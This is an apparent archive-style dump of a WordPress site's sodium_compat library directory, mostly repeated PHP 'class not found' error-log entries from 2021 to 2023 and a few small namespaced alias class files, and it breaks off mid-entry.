/home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [03-Jun-2022 10:35:02 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [24-Jun-2022 22:41:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [26-Jun-2022 00:06:53 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [07-Jul-2022 13:52:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [11-Sep-2022 02:57:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [17-Sep-2022 18:12:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [18-Sep-2022 00:47:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [02-Oct-2022 21:44:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [21-Oct-2022 02:06:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [29-Oct-2022 20:17:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [09-Nov-2022 06:03:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [16-Nov-2022 16:32:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [21-Nov-2022 09:24:36 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [06-Dec-2022 02:23:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [13-Dec-2022 23:17:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [16-Dec-2022 18:36:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [26-Dec-2022 00:53:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [07-Jan-2023 12:10:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [20-Jan-2023 18:48:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [27-Jan-2023 20:18:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [27-Jan-2023 20:33:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [06-Feb-2023 04:31:46 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [26-Jun-2023 13:39:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [08-Jul-2023 16:56:03 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [14-Jul-2023 15:42:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [21-Jul-2023 14:20:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_IetfCtx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php on line 4 [02-Aug-2023 04:32:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [07-Aug-2023 22:11:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 [19-Aug-2023 20:53:53 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20_Ctx' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php on line 4 namespaced/Core/SipHash.php 0000644 00000000142 15057664256 0011621 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class SipHash extends \ParagonIE_Sodium_Core_SipHash { } namespaced/Core/Poly1305.php 0000644 00000000144 15057664256 0011520 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class Poly1305 extends \ParagonIE_Sodium_Core_Poly1305 { } namespaced/Core/Xsalsa20.php 0000644 00000000144 15057664256 0011661 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class Xsalsa20 extends \ParagonIE_Sodium_Core_XSalsa20 { } namespaced/Core/X25519.php 0000644 00000000140 15057664256 0011075 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class X25519 extends \ParagonIE_Sodium_Core_X25519 { } namespaced/Core/ChaCha20.php 0000644 00000000144 15057664256 0011535 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class ChaCha20 extends \ParagonIE_Sodium_Core_ChaCha20 { } namespaced/Core/error_log 0000644 00000225457 15057664256 0011510 0 ustar 00 [06-Aug-2021 05:50:09 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [06-Aug-2021 05:51:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [06-Aug-2021 05:52:26 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [06-Aug-2021 05:53:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [06-Aug-2021 05:54:02 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [06-Aug-2021 05:54:50 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [06-Aug-2021 05:55:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [06-Aug-2021 09:39:49 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [06-Aug-2021 13:22:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [07-Aug-2021 03:17:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [08-Aug-2021 01:17:10 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [09-Aug-2021 01:18:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [16-Aug-2021 16:12:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [04-Oct-2021 19:20:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [04-Oct-2021 19:22:32 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [04-Oct-2021 19:23:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [04-Oct-2021 19:39:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [04-Oct-2021 19:40:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [05-Oct-2021 10:38:32 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [05-Oct-2021 13:00:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [05-Oct-2021 22:30:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [06-Oct-2021 03:20:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [20-Oct-2021 04:23:44 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [20-Oct-2021 04:46:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [20-Oct-2021 08:21:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [21-Oct-2021 00:31:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [21-Oct-2021 05:54:46 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [21-Oct-2021 05:58:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [21-Oct-2021 06:21:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [21-Oct-2021 22:24:20 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [22-Oct-2021 16:24:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [25-Oct-2021 00:46:27 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [27-Oct-2021 08:29:18 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [27-Oct-2021 13:50:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [28-Oct-2021 22:26:36 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [31-Oct-2021 03:14:38 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [31-Oct-2021 17:10:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [03-Nov-2021 03:54:12 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [03-Nov-2021 05:10:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [11-Nov-2021 09:05:17 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [13-Nov-2021 10:58:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [15-Nov-2021 19:29:17 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [16-Nov-2021 06:18:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php on line 4 [16-Nov-2021 21:19:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [18-Nov-2021 23:05:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [21-Nov-2021 19:09:09 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [25-Nov-2021 21:59:53 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [26-Nov-2021 06:04:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [27-Nov-2021 04:07:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [27-Nov-2021 17:52:26 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [28-Nov-2021 04:22:45 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [28-Nov-2021 12:16:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [30-Nov-2021 00:24:50 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in 